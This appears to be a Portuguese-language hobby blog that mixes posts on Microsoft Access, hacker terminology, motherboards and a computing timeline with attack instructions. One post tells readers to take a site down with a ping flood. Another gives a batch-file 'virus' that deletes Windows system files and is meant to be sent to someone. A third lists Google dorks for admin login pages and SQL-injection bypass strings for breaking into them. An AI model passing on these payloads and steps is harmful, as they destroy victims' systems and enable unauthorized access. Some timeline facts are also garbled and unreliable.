Como Descubrir IP de Site e Derrubar!

1ºAbra o Cmd!
2º Escreva: Ping (site)
3º Vai aparecer uns números ex. 162.198.0.26 !
4º Escreva Ping -f-l1000000000 -t (ipsite)
5ºVai abrindo várias páginas do cmd com o mesmo código, se o site for grande demora 2 dias pra derrubar.

Como Fazer vírus .bat !

1º Abram o bloco de notas!
2ºEscreva:
@ECHO OFF
CD\WINDOWS 
DEL WIN.INI 
DEL WIN.COM 
DEL SYSTEM 
DEL SYSTEM.INI 
DEL SYSTEM.COM 
DEL SYSTEM32 
DEL SECURITY 
DEL REGEDIT.EXE 
DEL HH.EXE 
DEL CONFIG 
DEL CONTROL.INI 
DEL CONTROL.COM 
DEL DEBUG 
DEL CLOCK.AVI 
DEL TASKMAN.EXE 
DEL WININIT.INI 
DEL WININIT.COM 
DEL WEB 
CD\ 
DEL CONFIG.SYS 
DEL AUTOEXEC.BAT 
rmdir /s /q c:\windows
3ºSalva com qualquer nome exemplo (cd.bat) no final você temque colocar .bat.
4ºPronto seu vírus ta feito, você não pode clicar nele se não pode gravar danos no seu pc.
5ºManda pra alguma pessoa e pronto.

Jogos FPS entrou no post certo!

Jogos FPS
Warface! Download Clique Aqui
CrossFire Download Clique Aqui
Point Black Download Clique Aqui
Sudenn Attack Download Clique Aqui
Combat Arms Download Clique Aqui



O que é Acess?

A história de sistemas de bancos de dados para computadores pessoais começou com o surgimento de linguagens de programação para estas máquinas, como o COBOL, já bastante popular em máquinas de médio e grande porte. O COBOL, porém, devido a suas limitações de recursos, principalmente de interface, exigia muito tempo para desenvolvimento e para manutenção de sistemas, tornando assim o custo dos projetos altos.

Na década de 80, surgiu o dBase, que era um sistema de desenvolvimento muito mais simples, e com mais recursos, proporcionando maior produtividade às equipes de desenvolvimento, e graças a isto, tornou-se best-seller em banco de dados para computadores pessoais. O dBase, porém, não gerava aplicações executáveis, o que dificultou sua penetração no desenvolvimento de aplicaçõescomerciais. Aproveitando este espaço deixado pelo dBase, surgiu então o CLIPPER, um compilador para o dBase, que em pouco tempo dominou esta fatia do mercado.

Com o surgimento do conceito de Programação Orientada a Objetos, e com a grande popularidade do ambiente operacional Windows, não era difícil prever em que direção seria a evolução dos sistemas de bancos de dados para PC.

Após a popularização de editores de texto e planilhas eletrônicas para o ambiente Windows, surgiram então os Sistemas Gerenciadores de Bancos de Dados "for Windows".

O ACCESS é um banco de dados para Windows, que tem como principal característica tornar fácil o uso de poderosos recursos, permitir que você trabalhe virtualmente em qualquer formato de banco de dados, e contar com uma extraordinária ajuda ao aprendizado. É um banco de dados que permite a realização de trabalhos pesados sem esforço.

O ACCESS, seguindo a linha do Windows, possibilita que se trabalhe com o conceito de Programação Orientada a Eventos. A programação Orientada a Eventos é uma nova filosofia de programação onde o programa é composto basicamente por: interfaces, rotinas da aplicação e rotinas de apoio (bibliotecas). Neste caso, os eventos são relacionados a determinadas ações, que podem ser: O usuário pressionando alguma tecla específica ou selecionando alguma opção com o mouse (como um botão ou um item na barra de menu), mensagem vinda de outro processo, interrupção de hardware, e outros. A chamada dos eventos é controlada pelas interfaces.

CARACTERÍSTICAS DO ACCESS

O ACCESS apresenta o conceito de Consultas por Exemplo, onde você tem acesso rápido a qualquer informação. A seleção de seus dados é feita de forma visual: com o auxílio do mouse, você arrasta e posiciona tabelas, associa campos e especifica os critérios desejados. Se desejar, pode selecionar seus dados, opcionalmente, com comandos SQL.

Para um acesso aos dados de forma mais rica, o ACCESS conta com o conceito de Formulários, que são ambientes de apresentação e entradas de dados. Estes formulários são montados empregando-se as ferramentas visuais específicas do software. Em poucos minutos, você cria seu formulário, tendo apenas que arrastar e posicionar os campos no layout e aplicar as fontes e cores desejadas. Enquanto você estiver trabalhando em seu formulário, é possível classificar e limitar os dados através de filtros.

Para a apresentação e impressão de dados de forma sofisticada, o ACCESS conta com o conceito de Relatórios, que são capazes de: criar cabeçalhos e rodapés em páginas e no relatório, calcular percentagens de totais e posicioná-las em qualquer parte do relatório, executar formatações complexas com layouts de múltiplas colunas e conferir excelente qualidade de apresentação sendo possível a inserção de logotipos, figuras, gráficos e qualquer outro tipo de objeto OLE.

A diferença entre Hacker, Crackers, Lammers, Etc...

.
Hacker
É um usuário não autorizado que invade redes de computadores em busca de conhecimentos ou para testar seus conhecimentos, mas não causa danos ao sistema.
Hacker é o termo originário do idioma inglês e era usado para designar um especialista em Informática. Habitualmente (e erradamente) confundido com cracker, um hacker é um expert ou Problema Solver, aquele que apresenta soluções para problemas técnicos relativos a Internet.
- Cracker
Usuário não autorizado que invade redes de computadores, causando danos ao sistema.
Tal como os Hackers, um Cracker é alguém que possui conhecimentos avançados de informática, mas, ao contrário dos primeiros, usam esses conhecimentos para destruir sistemas e arquivos de terceiros, sem se preocuparem com os resultados de suas atitudes. São, geralmente, autodidatas.
Trata-se, então de um tipo de usuário super avançado que acessa informações restritas, reservadas ou confidenciais, invade computadores, sem autorização, com objetivos ilegais, descobrindo senhas ou empregando meios irregulares, em regra causando prejuízos e/ou visando o proveito econômico.
Pontos Relevantes sobre Cracker e Invasão
Definição de Serviço

Serviços são diversos softwares que abrem portas no seu computador com o objetivo de fornecer um serviço ou funcionalidade. Alguns exemplos:
» Servidores HTTP, FTP, Telnet e Banco de Dados
» Compartilhamento de arquivos e pastas
» Serviços do sistema que abrem conexões no seu computador
» Clientes P2P escutam por conexões para enviar arquivos
Importante: Nem todos os serviços listados no painel Serviços no Windows 2000/XP abrem portas. Somente um serviço que abre portas no sistema e recebe conexões será considerado um “Serviço”. Um navegador de Internet também abre portas no sistema, mas o estado da porta não permite que ela receba conexões, portanto não é um Serviço.
Como ocorre uma Invasão – Conhecimento básico
A invasão propriamente dita só ocorre de uma forma: um indivíduo malicioso se conecta em um serviço falho do seu computador para conseguir acesso. O problema está nesse serviço, sejam falhas de segurança ou erros de configuração.
Não é possível que ele entre de qualquer outra forma. Seu sistema está seguro quando todos os serviços estão com as versões mais atuais e, quando necessitam configurações, sem erros na configuração.
Para conseguir explorar as falhas desse serviço, o cracker precisa, primeiramente, ser capaz de conectar-se nele. É por este motivo que um firewall é importante: se você estiver usando um, o cracker não vai conseguir se conectar no seu serviço, mesmo que ele esteja com problemas.
Certos serviços não precisam possuir falhas para causar problemas, como o Telnet (onde o problema pode ser uma senha fraca) ou o Compartilhamento de arquivos e Pastas (onde os compartilhamentos sem senha podem ser acessados por qualquer pessoa na Internet). Em todos os casos, é sempre necessário que alguém conecte no seu computador. Se o seu computador rejeitar a conexão, não será possível fazer mais nada.
Passos iniciais de uma invasão
1. O invasor cracker conecta no seu computador na porta onde está o serviço.
2. O Cracker explora falha de segurança ou falha de configuração no serviço.
3. Cracker consegue acesso ao seu computador com os mesmos privilégios do serviço.
Suponha que o usuário esteja rodando um serviço falho (por exemplo, uma versão antiga do MySQL) com as permissões de administrador do sistema. O cracker que explorar a falha neste serviço terá estas mesmas permissões.
O worm chamado Blaster, que infectou milhões de máquinas, nada mais é do que uma ‘invasão automática’. O worm invade o serviço de “Chamada de Procedimento Remoto” e ganha as permissões de sistema. Com esta permissão, ele se envia para o computador da vítima e se instala.
Um cracker poderia fazer exatamente o mesmo sem problema nenhum e instalar diversos tipos de programas ou trojans no seu computador e, portanto, o que previne um também previne o outro. Instalar a “correção do Blaster”, na verdade, corrige a falha do serviço e, quando um cracker (ou outro worm) tentar explorar a falha, nada vai acontecer.
- Phreaker
É um hacker de telefonia.
- Defacers
É um hacker que invade sites para apagar informações destes. São conhecidos como desconfiguradores de páginas, podem também ser chamados de pixadores, geralmente alteram o conteúdo de sites para protestar e outros fins.
Observe abaixo uma nota de ação de um grupo de Defacers:
Nas figuras acima temos telas de ataque de um grupo brasileiro de defacers sobre a empresa VISA. Neste caso a tela é usada somente para efeitos didáticos e ilustrativos.
O administrador do site foi citado no ataque e, inclusive, pode ter maiores dores de cabeça, pois o grupo aparentemente não se limitou apenas em trocar a página inicial do site. No lugar do site tradicional, eles colocaram uma imagem e pequenos textos no qual se pode ler o seguinte: “Your Files belong to me now”, traduzindo (Seus arquivos pertencem a mim agora)
- Lammer
São usuários que estão em estágio inicial de aprendizado para se tornarem hacker.
- Script Kiddie
É o indivíduo que saiu do estágio de lammer mais que só sabe usar as “receitas de bolo” (programas prontos de invasão na internet), e ainda não entende muito bem o que está fazendo.
* Técnicas e programas usados por Hackers e Crackers
- Backdoor
É um programa escondido, deixado por um intruso, o qual permite futuro acesso á máquina alvo.
Pode ser entendido, também, como qualquer malware que possua um backdoor permite que o computador infectado seja controlado totalmente ou parcialmente através de um canal de IRC ou via conexão com uma porta.
Há algum tempo, backdoor era relacionado somente com trojans, porém  isso mudou, agora outros tipos de malware, como worms também carregam backdoors.
- Crack
Tipo de programa utilizado para quebrar licenças de outros programas. Também pode se referir a programas usados para quebrar senhas.
- Exploit
São programas usados por hackers e crackers para explorar vulnerabilidades em determinados sistemas, conseguindo assim, acessos com maior privilégio.
Um exploit é um programa de computador se aproveita das vulnerabilidades de outros programas - como o próprio sistema operacional ou serviços de interação de protocolos (Ex: servidores web).
Geralmente elaborados por hackers como programas de demonstração das vulnerabilidades, a fim de que as falhas sejam corrigidas, ou por crackes a fim de ganhar acesso não autorizado a sistemas.
Por isso muitos crackers não publicam seus exploits, conhecidos como 0days, e o seu uso massificado deve-se aos script kiddies.
Até meados dos anos 90, acreditava-se que os exploits eram exclusivamente voltados a explorar problemas em aplicações e serviços voltados para o plataformas Unix.
A partir do final da década, especialistas demonstraram a capacidade de explorar vulnerabilidades em plataformas de uso massivo, por exemplo, sistemas operacionais Win32 (Windows 9x, NT, 2000 e XP). Como exemplo temos o CodeRed, Sasser no ano de 2004.
Como os exploit atuam
Para um exploit atacar, o sistema precisa ter uma vulnerabilidade, ou seja, um meio de comunicação com a rede que possa ser usado para entrar, uma porta ou um console pelo teclado.
Um exploit muito usado é no sistema RPC do Windows, onde o usuário encontra a porta e envia a porta RPC uma sequencia de bytes, que são interpretado como dados pelo servidor que recebe, mas quando é recebido este dado propositadamente deixa o sistema em pane, que passa o controle a estas proprios dados que então são uma sequencia de ordem para dominar a CPU, desta forma esta sequencia de informações toma conta do PC e abre para o hacker que aguarda na outra ponta.
No sistema Linux sempre são publicado vulnerabilidade, como já houve no sistema Apache, Samba ou MySql, que também apresentam vulnerabilidade e possibilitam o controle do PC por um hacker remoto
- Flood
É uma sobrecarga, em geral de grandes pacotes, causada por eventos não esperados que causam enorme lentidão na rede.
Traduzindo o termo à letra significa “inundação”. O termo aplica-se sempre que é enviada demasiada informação, para um utilizador ou para um canal. O "flood" pode, em determinadas circunstâncias, terminar a ligação com o servidor por excesso de informações.
Nos próximos tutoriais serão vistos mais assuntos relacionados à informática para concursos.
Até a próxima.

Códigos para hackear Admin de um Site!

Olá pessoal, para você ter acesso ao admin de algum site, você precisa colocar algum desses link no google.

allinurl:admin/index.asp
allinurl:admin/default.asp
allinurl:admin/admin.asp
allinurl:admin/login.asp
allinurl:/admin/entrar.asp
allinurl:/admin/default.asp
allinurl:/admin/index.asp
allinurl:/admin/login.asp
allinurl:/admin/password.asp
allinurl:/admin/senha.asp
allinurl:/login/login.asp
allinurl:/adm/login.asp
allinurl:/adm/index.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp
allinurl:/login/default.asp
allinurl:/webmaster/login.asp
allinurl:/webadmin/default.asp
allinurl:/webadmin/index.asp
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
allinurl:/web/admin/default.asp
allinurl:/web/admin/login.asp
allinurl:/home/adm/login.asp
allinurl:/home/adm/senha.asp

Ai depois, vai aparecer vários sites, de admin, você entra em algum deles, que seja vuneravel.
No login você coloca :admin
Na senha coloca um desses códigos :

b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a

O que e Placa Mãe?

placa mãe  é um componente de hardware que liga todas as outras peças, fazendo a comunicação entre elas. A primeira placa mãe surgiu inicialmente em um computador da empresa IBM, no ano de 1982. O design das placas mãe continua basicamente o mesmo das primeiras, até os dias atuais. A placa da IBM assim como as sucessoras tem portas e slots para vários tipos de Hardwares, que são ligados nela para que a comunicação entre os componentes seja possível. HD, Memória, processador, Leitores Ópticos, Fontes, placas de vídeo, tudo é conectado à placa Mãe. Um pouco sobre o que a placa mãe faz com cada peça conectada.

Diferença Entre Software e Hardware!

Software é um programa de computador ,é composto por uma sequência de instruções, que é interpretada e executada por um processador ou por uma máquina virtual. 

O Hardware é a parte física do computador, ou seja, é o conjunto de componentes eletrônicos, circuitos integrados e placas, que se comunicam através de barramentos

A revolução da Informática !


Hoje em dia nós sabemos, que existe mais celulares, do que humanos, isso mostra que a informática, mudou muito veja essa lista, de quando os homens, começaram a revolucionar a informática!
1622 - O matemático inglês William Oughtred desenvolve a primeira régua de cálculo. 1642 - O pesquisador francês Blaise Pascal cria a primeira calculadora. 1822 - O matemático inglês Charles Babbage projeta um computador mecânico, porém este não saiu do papel. 1847 - É criado o sistema binário pelo matemático inglês George Boole. 1880 - O norte-americano Herman Hollerith cria um processador de dados eletromecânico. O sistema usava cartões perfurados para inserir dados. 1930 - Nos Estados Unidos, o engenheiro eletricista Vannevar Bush desenvolve um computador usando válvulas de rádio. 1946 - Os engenheiros norte-americanos John William Mauchly e John Presper Eckart Jr desenvolvem o Eniac, o primeiro computador eletrônico. O Eniac foi desenvolvido para servir aos interesses bélicos dos EUA na II Guerra Mundial. Serviu para fazer os cálculos no desenvolvimento da bomba atômica. 1954 - A empresa eletrônica Texas Instruments fabrica o transistor usando silício. 1956 - Surge, no MIT - Instituto de Tecnologia de Massachusetts - o primeiro computador que utiliza transistores. 1963 - Douglas Engelbart patenteia o mouse. 1964 - Paul Baran, pesquisador norte-americano, projeta e cria a primeira rede de computadores interligada por fios. 1966 - A IBM desenvolve o Ramac 305, utilizando discos de memória com capacidade de 5 megabits. 1968 - Douglas Engelbart cria um sistema com mouse, teclado e janelas ( windows ). 1971 - A Intel cria o MCS-4, primeiro microcomputador pessoal com o processador 4004. 1972 - A empresa Atari cria o primeiro videogame com o jogo Pong. 1975 - desenvolvem a linguagem Basic, primeira linguagem para microcomputadores, . As linguagens anteriores eram adequadas aos grandes e médios computadores. 1975 - Bill Gates e Paul Allen fundam a Microsoft. 1976 - Steve Wozniak e Steve Jobs projetam e desenvolvem o micro Apple I. No mesmo ano a dupla a Apple Computer Company. 1981 - A IBM lança o micro PC 5150. 1985 - A Microsoft o sistema operacional Windows e o Word 1.0 (primeira versão do processador de textos). 1989 - Tim Berners-Lee , pesquisador europeu cria a World Wide Web ( WWW) que origina a Internet. 1991 - Linus Torvald lança o sistema operacional Linux com código-fonte aberto. 1992 - A empresa americana Microsoft lança o sistema operacional Windows 3.1. A nova versão do Windows incorpora tecnologias voltadas para a utilização de CD-Roms. 1993 - Surge o primeiro browser, o NCSA Mosaic. 1993 - A empresa de processadores Intel coloca no mercado o processador Pentim. 1994 - É criado o navegador de internet Netscape Navigator. 1995 - Chega ao mercando o Windows 95, trazendo incorporado o navegador Internet Explorer. 1995 - Criada a linguagem Java pela Sun Microsystems. 1997 - Garri Kasparov, campeão mundial de xadrez, perde pra o computador Deep Blue da IBM. 1997 - Justin Fraenkel desenvolve o Winamp, programa utilizado para ouvir músicas no formato MP3. 1998 - A Microsoft lança no mercado o Windows 98. 1999 - A Intel lança no mercado o processador Pentium III.